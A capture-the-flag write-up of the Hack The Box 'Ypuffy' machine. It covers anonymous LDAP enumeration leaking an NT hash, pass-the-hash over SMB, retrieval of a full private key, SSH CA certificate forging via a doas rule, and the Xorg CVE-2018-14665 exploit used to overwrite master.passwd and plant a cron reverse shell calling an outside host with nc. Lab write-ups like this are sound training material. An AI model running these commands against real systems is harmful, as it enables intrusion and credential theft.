Ypuffy is medium difficulty machine which highlights the danger of allowing LDAP null sessions. It also features an interesting SSH CA authentication privilege escalation, via the OpenBSD doas command. An additional privilege escalation involving Xorg is also possible.
Masscan + Nmap
1
2
3
4
5
6
7
$ masscan -p1-65535,U:1-65535 `IP` --rate=5000 -e tun0 | tee masscan.out
Scanning 1 hosts [131070 ports/host]
Discovered open port 139/tcp on 10.10.10.107
Discovered open port 80/tcp on 10.10.10.107
Discovered open port 22/tcp on 10.10.10.107
Discovered open port 389/tcp on 10.10.10.107
Discovered open port 445/tcp on 10.10.10.107
Parse those ports to nmap:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
$ ports=$(cat masscan.out |awk '{ print $4 }' | sed 's/\/tcp//;s/\/udp//' | tr '\n' ',' | sed 's/,$//')
$ nmap -v -sVC --min-rate 1000 -p $ports `IP` -oN nmap-fullscan.out
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 2e:19:e6:af:1b:a7:b0:e8:07:2a:2b:11:5d:7b:c6:04 (RSA)
| 256 dd:0f:6a:2a:53:ee:19:50:d9:e5:e7:81:04:8d:91:b6 (ECDSA)
|_ 256 21:9e:db:bd:e1:78:4d:72:b0:ea:b4:97:fb:7f:af:91 (ED25519)
80/tcp open http OpenBSD httpd
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: YPUFFY)
389/tcp open ldap (Anonymous bind OK)
445/tcp open netbios-ssn Samba smbd 4.7.6 (workgroup: YPUFFY)
Service Info: Host: YPUFFY
Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6)
| Computer name: ypuffy
| NetBIOS computer name: YPUFFY\x00
| Domain name: hackthebox.htb
| FQDN: ypuffy.hackthebox.htb
|_ System time: 2021-08-18T12:06:02-04:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-08-18T16:06:03
|_ start_date: N/A
Added hackthebox.htb
, ypuffy.hackthebox.htb
as hosts.
HTTP
Not accessible, even though nmap says it’s open.
1
2
3
4
5
6
7
8
root@TheCaretaker:~/HTB/Ypuffy# curl http://ypuffy.hackthebox.htb
curl: (52) Empty reply from server
root@TheCaretaker:~/HTB/Ypuffy# nc ypuffy.hackthebox.htb 80 -v
ypuffy.hackthebox.htb [10.10.10.107] 80 (http) open
GET /
help
.HELP
?
Responds with nothing.
But if I wait for something like 5 mins:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$ nc ypuffy.hackthebox.htb 80 -v
ypuffy.hackthebox.htb [10.10.10.107] 80 (http) open
GET /
HTTP/1.0 408 Request Timeout
Date: Wed, 18 Aug 2021 16:18:53 GMT
Server: OpenBSD httpd
Connection: close
Content-Type: text/html
Content-Length: 439
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>408 Request Timeout</title>
<style type="text/css"><!--
body { background-color: white; color: black; font-family: 'Comic Sans MS', 'Chalkboard SE', 'Comic Neue', sans-serif; }
hr { border: 0; border-bottom: 1px dashed; }
--></style>
</head>
<body>
<h1>408 Request Timeout</h1>
<hr>
<address>OpenBSD httpd</address>
</body>
</html>
Shows the server - OpenBSD httpd
, same thing which nmap
did.
LDAP
Either I can run nmap
with ldap scripts like: nmap -p 389 --script *ldap* 10.10.10.107
or ldapsearch
with the domain as hackthebox.htb
which I got from nmap results.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
$ ldapsearch -x -h `IP` -b "DC=hackthebox,DC=htb"
# extended LDIF
#
# LDAPv3
# base <DC=hackthebox,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# hackthebox.htb
dn: dc=hackthebox,dc=htb
dc: hackthebox
objectClass: top
objectClass: domain
# passwd, hackthebox.htb
dn: ou=passwd,dc=hackthebox,dc=htb
ou: passwd
objectClass: top
objectClass: organizationalUnit
# bob8791, passwd, hackthebox.htb
dn: uid=bob8791,ou=passwd,dc=hackthebox,dc=htb
uid: bob8791
cn: Bob
objectClass: account
objectClass: posixAccount
objectClass: top
userPassword:: e0JTREFVVEh9Ym9iODc5MQ==
uidNumber: 5001
gidNumber: 5001
gecos: Bob
homeDirectory: /home/bob8791
loginShell: /bin/ksh
# alice1978, passwd, hackthebox.htb
dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
uid: alice1978
cn: Alice
objectClass: account
objectClass: posixAccount
objectClass: top
objectClass: sambaSamAccount
userPassword:: e0JTREFVVEh9YWxpY2UxOTc4
uidNumber: 5000
gidNumber: 5000
gecos: Alice
homeDirectory: /home/alice1978
loginShell: /bin/ksh
sambaSID: S-1-5-21-3933741069-3307154301-3557023464-1001
displayName: Alice
sambaAcctFlags: [U ]
sambaPasswordHistory: 00000000000000000000000000000000000000000000000000000000
sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B
sambaPwdLastSet: 1532916644
# group, hackthebox.htb
dn: ou=group,dc=hackthebox,dc=htb
ou: group
objectClass: top
objectClass: organizationalUnit
# bob8791, group, hackthebox.htb
dn: cn=bob8791,ou=group,dc=hackthebox,dc=htb
objectClass: posixGroup
objectClass: top
cn: bob8791
userPassword:: e2NyeXB0fSo=
gidNumber: 5001
# alice1978, group, hackthebox.htb
dn: cn=alice1978,ou=group,dc=hackthebox,dc=htb
objectClass: posixGroup
objectClass: top
cn: alice1978
userPassword:: e2NyeXB0fSo=
gidNumber: 5000
# ypuffy, hackthebox.htb
dn: sambadomainname=ypuffy,dc=hackthebox,dc=htb
sambaDomainName: YPUFFY
sambaSID: S-1-5-21-3933741069-3307154301-3557023464
sambaAlgorithmicRidBase: 1000
objectclass: sambaDomain
sambaNextUserRid: 1000
sambaMinPwdLength: 5
sambaPwdHistoryLength: 0
sambaLogonToChgPwd: 0
sambaMaxPwdAge: -1
sambaMinPwdAge: 0
sambaLockoutDuration: 30
sambaLockoutObservationWindow: 30
sambaLockoutThreshold: 0
sambaForceLogoff: -1
sambaRefuseMachinePwdChange: 0
sambaNextRid: 1001
# search result
search: 2
result: 0 Success
# numResponses: 9
# numEntries: 8
I see a lot of users and passwords, also a NThash of alice1978
which is 0B186E661BBDBDCF6047784DE8B9FD8B
.
Let’s take out all the passwords:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ ldapsearch -x -h `IP` -D '' -w '' -b "DC=hackthebox,DC=htb" | grep -i -A2 -B2 "userpas"
objectClass: posixAccount
objectClass: top
userPassword:: e0JTREFVVEh9Ym9iODc5MQ==
uidNumber: 5001
gidNumber: 5001
--
objectClass: top
objectClass: sambaSamAccount
userPassword:: e0JTREFVVEh9YWxpY2UxOTc4
uidNumber: 5000
gidNumber: 5000
--
objectClass: top
cn: bob8791
userPassword:: e2NyeXB0fSo=
gidNumber: 5001
--
objectClass: top
cn: alice1978
userPassword:: e2NyeXB0fSo=
gidNumber: 5000
These passwords seem to be base64 encoded. When I decode them, they just come like in the format: {BSDAUTH}username
eg. {BSDAUTH}alice1978
. That isn’t userful to me.
Pass-the-hash with SMB
Checking for anonymous
login:
1
2
3
4
$ smbclient -L ypuffy.hackthebox.htb -U anonymous
WARNING: no network interfaces found
Enter WORKGROUP\anonymous's password:
session setup failed: NT_STATUS_LOGON_FAILURE
Checking for any user named “anonymous” (being on the safer side; from trolls)
1
2
3
4
$ smbclient -L ypuffy.hackthebox.htb -U anonymous
WARNING: no network interfaces found
Enter WORKGROUP\anonymous's password:
session setup failed: NT_STATUS_LOGON_FAILURE
I can try with crackmapexec
for ldap
with the NThash:
1
2
3
4
5
$ crackmapexec ldap `IP` -u alice1978 -H 0B186E661BBDBDCF6047784DE8B9FD8B
LDAP 10.10.10.107 389 YPUFFY [*] Windows 6.1 (name:YPUFFY) (domain:hackthebox.htb) (signing:False) (SMBv1:True)
Traceback (most recent call last):
File "/usr/bin/crackmapexec", line 33, in <module>
sys.exit(load_entry_point('crackmapexec==5.1.4.dev0', 'console_scripts', 'crackmapexec')())
crackmapexec
for smb
gives as valid:
1
2
3
$ crackmapexec smb `IP` -u alice1978 -H 0B186E661BBDBDCF6047784DE8B9FD8B
SMB 10.10.10.107 445 YPUFFY [*] Windows 6.1 (name:YPUFFY) (domain:hackthebox.htb) (signing:False) (SMBv1:True)
SMB 10.10.10.107 445 YPUFFY [+] hackthebox.htb\alice1978 0B186E661BBDBDCF6047784DE8B9FD8B
So, smbclient
does support pass-the-hash method. I’ll try for user alice.
1
2
3
4
5
6
7
8
9
$ smbclient -L `IP` -U alice1978 --pw-nt-hash=0B186E661BBDBDCF6047784DE8B9FD8B -W hackthebox.local
WARNING: no network interfaces found
Enter HACKTHEBOX.LOCAL\alice1978's password:
Sharename Type Comment
--------- ---- -------
alice Disk Alice's Windows Directory
IPC$ IPC IPC Service (Samba Server)
SMB1 disabled -- no workgroup available
Getting data from alice share:
1
2
3
4
5
6
7
8
9
10
11
12
13
smbclient //`IP`/alice -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash
WARNING: no network interfaces found
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jul 31 08:24:20 2018
.. D 0 Wed Aug 1 08:46:50 2018
my_private_key.ppk A 1460 Tue Jul 17 07:08:51 2018
433262 blocks of size 1024. 411540 blocks available
smb: \> mget *
Get file my_private_key.ppk? y
getting file \my_private_key.ppk of size 1460 as my_private_key.ppk (4.0 KiloBytes/sec) (average 4.0 KiloBytes/sec)
smb: \> exit
PuTTY ppk to SSH
Checking what that key is, and it’s a PuTTY private key.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
$ file my_private_key.ppk
my_private_key.ppk: PuTTY Private Key File, version 2, algorithm ssh-rsa, Encryption none "rsa-key-20180716"
$ cat my_private_key.ppk
PuTTY-User-Key-File-2: ssh-rsa
Encryption: none
Comment: rsa-key-20180716
Public-Lines: 6
AAAAB3NzaC1yc2EAAAABJQAAAQEApV4X7z0KBv3TwDxpvcNsdQn4qmbXYPDtxcGz
1am2V3wNRkKR+gRb3FIPp+J4rCOS/S5skFPrGJLLFLeExz7Afvg6m2dOrSn02qux
BoLMq0VSFK5A0Ep5Hm8WZxy5wteK3RDx0HKO/aCvsaYPJa2zvxdtp1JGPbN5zBAj
h7U8op4/lIskHqr7DHtYeFpjZOM9duqlVxV7XchzW9XZe/7xTRrbthCvNcSC/Sxa
iA2jBW6n3dMsqpB8kq+b7RVnVXGbBK5p4n44JD2yJZgeDk+1JClS7ZUlbI5+6KWx
ivAMf2AqY5e1adjpOfo6TwmB0Cyx0rIYMvsog3HnqyHcVR/Ufw==
Private-Lines: 14
AAABAH0knH2xprkuycHoh18sGrlvVGVG6C2vZ9PsiBdP/5wmhpYI3Svnn3ZL8CwF
VGaXdidhZunC9xmD1/QAgCgTz/Fh5yl+nGdeBWc10hLD2SeqFJoHU6SLYpOSViSE
cOZ5mYSy4IIRgPdJKwL6NPnrO+qORSSs9uKVqEdmKLm5lat9dRJVtFlG2tZ7tsma
hRM//9du5MKWWemJlW9PmRGY6shATM3Ow8LojNgnpoHNigB6b/kdDozx6RIf8b1q
Gs+gaU1W5FVehiV6dO2OjHUoUtBME01owBLvwjdV/1Sea/kcZa72TYIMoN1MUEFC
3hlBVcWbiy+O27JzmDzhYen0Jq0AAACBANTBwU1DttMKKphHAN23+tvIAh3rlNG6
m+xeStOxEusrbNL89aEU03FWXIocoQlPiQBr3s8OkgMk1QVYABlH30Y2ZsPL/hp6
l4UVEuHUqnTfEOowVTcVNlwpNM8YLhgn+JIeGpJZqus5JK/pBhK0JclenIpH5M2v
4L9aKFwiMZxfAAAAgQDG+o9xrh+rZuQg8BZ6ZcGGdszZITn797a4YU+NzxjP4jR+
qSVCTRky9uSP0i9H7B9KVnuu9AfzKDBgSH/zxFnJqBTTykM1imjt+y1wVa/3aLPh
hKxePlIrP3YaMKd38ss2ebeqWy+XJYwgWOsSw8wAQT7fIxmT8OYfJRjRGTS74QAA
AIEAiOHSABguzA8sMxaHMvWu16F0RKXLOy+S3ZbMrQZr+nDyzHYPaLDRtNE2iI5c
QLr38t6CRO6zEZ+08Zh5rbqLJ1n8i/q0Pv+nYoYlocxw3qodwUlUYcr1/sE+Wuvl
xTwgKNIb9U6L6OdSr5FGkFBCFldtZ/WSHtbHxBabb0zpdts=
Private-MAC: 208b4e256cd56d59f70e3594f4e2c3ca91a757c9
Converting PuTTY key to SSH private key:
1
$ puttygen my_private_key.ppk -O private-openssh -o id_rsa
Logging in as alice1978
:
1
2
3
4
5
6
7
8
9
10
11
12
13
$ m
OpenBSD 6.3 (GENERIC) #100: Sat Mar 24 14:17:45 MDT 2018
Welcome to OpenBSD: The proactively secure Unix-like operating system.
Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.
ypuffy$ whoami
alice1978
Privesc via SSH CA authentication
PostgreSQL
Checking for open ports, I’ve one for postgresql
server:
1
2
3
4
5
6
ypuffy$ netstat -l -p tcp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp 0 0 *.microsof *.* LISTEN
tcp 0 0 localhost.postgres *.* LISTEN
tcp 0 0 *.www *.* LISTEN
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
ypuffy$ netstat -lu
Active UNIX domain sockets
Address Type Recv-Q Send-Q Inode Conn Refs Nextref Addr
0x0 stream 0 0 0x0 0x0 0x0 0x0
0x0 stream 0 0 0x0 0x0 0x0 0x0 /var/run/cron.sock
0x0 stream 0 0 0x0 0x0 0x0 0x0
0x0 stream 0 0 0x0 0x0 0x0 0x0
0x0 stream 0 0 0x0 0x0 0x0 0x0
0x0 stream 0 0 0x0 0x0 0x0 0x0
0x0 stream 0 0 0x0 0x0 0x0 0x0
0x0 stream 0 0 0x0 0x0 0x0 0x0
0x0 stream 0 0 0x0 0x0 0x0 0x0
0x0 stream 0 0 0x0 0x0 0x0 0x0
0x0 stream 0 0 0x0 0x0 0x0 0x0 /var/www/run/wsgi/sshauthd.socket
0x0 stream 0 0 0x0 0x0 0x0 0x0 /tmp/.s.PGSQL.5432
0x0 stream 0 0 0x0 0x0 0x0 0x0 /var/run/samba/nmbd/unexpected
User bob8791
has a weird file named sshauth.sql
1
2
3
4
5
ypuffy$ ls -la /home/bob8791/dba
total 12
drwxr-xr-x 2 bob8791 bob8791 512 Jul 30 2018 .
drwxr-xr-x 3 bob8791 bob8791 512 Jul 30 2018 ..
-rw-r--r-- 1 bob8791 bob8791 268 Jul 30 2018 sshauth.sql
1
2
3
4
5
6
7
8
9
10
11
12
13
CREATE TABLE principals (
uid text,
client cidr,
principal text,
PRIMARY KEY (uid,client,principal)
);****
CREATE TABLE keys (
uid text,
key text,
PRIMARY KEY (uid,key)
);
grant select on principals,keys to appsrv;
I couldn’t login to postgresql
server using the default creds postgres:postgres
with psql
.
doas
If I run doas
, sudo
in openbsd, it shows nothing.
1
2
ypuffy$ doas -L
ypuffy$
Let’s check the config file for doas:
1
2
3
ypuffy$ cat /etc/doas.conf
permit keepenv :wheel
permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen
So, it gives nopass ssh-keygen execution as userca for alice1978.
Getting CA principal for root
Let’s check SSH config files:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
ypuffy$ cat /etc/ssh/sshd_config | grep -v '#'
PermitRootLogin prohibit-password
AuthorizedKeysFile .ssh/authorized_keys
AuthorizedKeysCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=keys&username=%u
AuthorizedKeysCommandUser nobody
TrustedUserCAKeys /home/userca/ca.pub
AuthorizedPrincipalsCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=principals&username=%u
AuthorizedPrincipalsCommandUser nobody
PasswordAuthentication no
ChallengeResponseAuthentication no
AllowAgentForwarding no
AllowTcpForwarding no
X11Forwarding no
Subsystem sftp /usr/libexec/sftp-server
There are 2 curl commands that are interesting, let’s use them.
This is integrated with the postgresql server running. With type=keys
, I can list my SSH-public key.
1
2
3
4
ypuffy$ curl 'http://127.0.0.1/sshauth?type=keys&username=alice1978'
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEApV4X7z0KBv3TwDxpvcNsdQn4qmbXYPDtxcGz1am2V3wNRkKR+gRb3FIPp+J4rCOS/S5skFPrGJLLFLeExz7Afvg6m2dOrSn02quxBoLMq0VSFK5A0Ep5Hm8WZxy5wteK3RDx0HKO/aCvsaYPJa2zvxdtp1JGPbN5zBAjh7U8op4/lIskHqr7DHtYeFpjZOM9duqlVxV7XchzW9XZe/7xTRrbthCvNcSC/SxaiA2jBW6n3dMsqpB8kq+b7RVnVXGbBK5p4n44JD2yJZgeDk+1JClS7ZUlbI5+6KWxivAMf2AqY5e1adjpOfo6TwmB0Cyx0rIYMvsog3HnqyHcVR/Ufw== rsa-key-20180716
ypuffy$ curl 'http://127.0.0.1/sshauth?type=keys&username=bob8791'
ypuffy$ curl 'http://127.0.0.1/sshauth?type=keys&username=root'
With type=principals
, I can get the principal for root: 3m3rgencyB4ckd00r
1
2
3
4
5
6
ypuffy$ curl 'http://127.0.0.1/sshauth?type=principals&username=root'
3m3rgencyB4ckd00r
ypuffy$ curl 'http://127.0.0.1/sshauth?type=principals&username=alice1978'
alice1978
ypuffy$ curl 'http://127.0.0.1/sshauth?type=principals&username=bob8791'
bob8791
doas for SSH with CA
So, I’ll generate SSH keys for root as user userca
, who manages all the SSH-CA authenticated keys. If I generate a SSH-key pair and set the public key for root with that pair, I can easily get root as I’ve the private key.
1
$ doas -u userca /usr/bin/ssh-keygen
Above command needs some extra flags for CA authentication.
If I google “ssh ca authentication”: access.redhat.com/documentation/……./creating_ssh_ca_certificate_signing-keys I get -
ssh-keygen -s ca_host_key -I certificate_ID -h ssh_host_rsa_key.pub
or
I do ssh-keygen --help
:
1
2
3
ssh-keygen -I certificate_identity -s ca_key [-hU] [-D pkcs11_provider]
[-n principals] [-O option] [-V validity_interval]
[-z serial_number] file ...
So, this command requires a public file at the end. (Says just file in the help, but the article mentions SSH public key)
- Generating a SSH-key pair:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
ypuffy$ ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/home/alice1978/.ssh/id_rsa): /tmp/id_rsa Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /tmp/id_rsa. Your public key has been saved in /tmp/id_rsa.pub. The key fingerprint is: SHA256:zHdJX37Q3tKAg9K1J/VipnyESQcxAGf1fKKDxHLzmtM alice1978@ypuffy.hackthebox.htb The key's randomart image is: +---[RSA 2048]----+ | ..+oBoo | | = + @ o | | o B O % =| | o = * % @.| | S o O + *| | . = o ..| | + E | | . | | | +----[SHA256]-----+ ypuffy$ ls id_rsa id_rsa.pub
- Running
doas
: SSH-keygen for CA authentication requires:-I
- Certificate ID for the user (Can keep anything for now, In a working environment, they could use this to track who was assigned a given cert.)-s
- Specifies that I want to sign a public key using the given CA private key.-n
- The principles to be included in the certificate./tmp/id_rsa.pub
- The public key that will be associated with the certificate.
1
2
ypuffy$ doas -u userca /usr/bin/ssh-keygen -I root -s /home/userca/ca -n 3m3rgencyB4ckd00r /tmp/id_rsa.pub
Signed user key /tmp/id_rsa-cert.pub: id "root" serial 0 for 3m3rgencyB4ckd00r valid forever
Now, you can just login with the id_rsa
, you earlier generated:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
ypuffy$ ssh -i id_rsa root@localhost
OpenBSD 6.3 (GENERIC) #100: Sat Mar 24 14:17:45 MDT 2018
Welcome to OpenBSD: The proactively secure Unix-like operating system.
Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.
ypuffy# whoami
root
ypuffy# cat /root/root.txt
1265f8e0a1984edd9dc1b6c3fcd1757f
Privesc via Xorg-x11-server
You can get this by simply finding exploits for OpenBSD 6.3.
Google “openbsd 6.3 privilege escalation” https://www.exploit-db.com/exploits/45742
or
If I check for SUID’s present on ypuffy, I’ll see Xorg-x11:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
ypuffy$ find / -type f -perm -4000 2>/dev/null
/usr/bin/chfn
/usr/bin/chpass
/usr/bin/chsh
/usr/bin/doas
/usr/bin/lpr
/usr/bin/lprm
/usr/bin/passwd
/usr/bin/su
/usr/libexec/lockspool
/usr/libexec/ssh-keysign
/usr/local/bin/pwned
/usr/local/libexec/dbus-daemon-launch-helper
/usr/sbin/authpf
/usr/sbin/authpf-noip
/usr/sbin/pppd
/usr/sbin/traceroute
/usr/sbin/traceroute6
/usr/X11R6/bin/Xorg
/sbin/ping
/sbin/ping6
/sbin/shutdown
The xorg-x11-server package on the system suffers from a root privilege escalation vulnerability (CVE-2018-14665).
Also there are 2 exploits in exploit-db for a single CVE. Named xorg-x11-server < 1.20.3 - Local Privilege Escalation
and xorg-x11-server 1.20.3 - Privilege Escalation
.
If I check my Xorg
version, it’s 1.19.6
< 1.20.3.
1
2
3
4
5
6
7
8
9
10
11
12
ypuffy$ Xorg -version
X.Org X Server 1.19.6
Release Date: 2017-12-20
X Protocol Version 11, Revision 0
Build Operating System: OpenBSD 6.3 amd64
Current Operating System: OpenBSD ypuffy.hackthebox.htb 6.3 GENERIC#100 amd64
Build Date: 24 March 2018 02:38:24PM
Current version of pixman: 0.34.0
Before reporting problems, check http://wiki.x.org
to make sure that you have the latest version.
Using https://www.exploit-db.com/exploits/45697:
The exploit tries to overwrite data in master.passwd
and change the password to Password1
1
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
I’ll overwrite /etc/crontab and get a shell.
1
2
3
4
5
6
7
8
9
10
11
12
$ cd /etc
$ Xorg -fp "* * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.26 4444 > /tmp/f" -logfile crontab :1 &
$ cat /etc/crontab
[ 668.598] (==) Automatically adding devices
[ 668.598] (==) Automatically enabling devices
[ 668.598] (==) Not automatically adding GPU devices
[ 668.598] (==) Max clients allowed: 256, resource mask: 0x1fffff
[ 668.598] (++) FontPath set to:
* * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.26 4444 > /tmp/f
[ 668.598] (==) ModulePath set to "/usr/X11R6/lib/modules"
[ 668.598] (II) The server relies on wscons to provide the list of input devices.
If no devices become available, reconfigure wscons or disable AutoAddDevices.
I get a rev-shell back as root.
1
2
3
4
5
6
7
8
$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.107] 24626
/bin/sh: No controlling tty (open /dev/tty: Device not configured)
/bin/sh: Can't find tty file descriptor
/bin/sh: warning: won't have full job control
ypuffy# whoami
root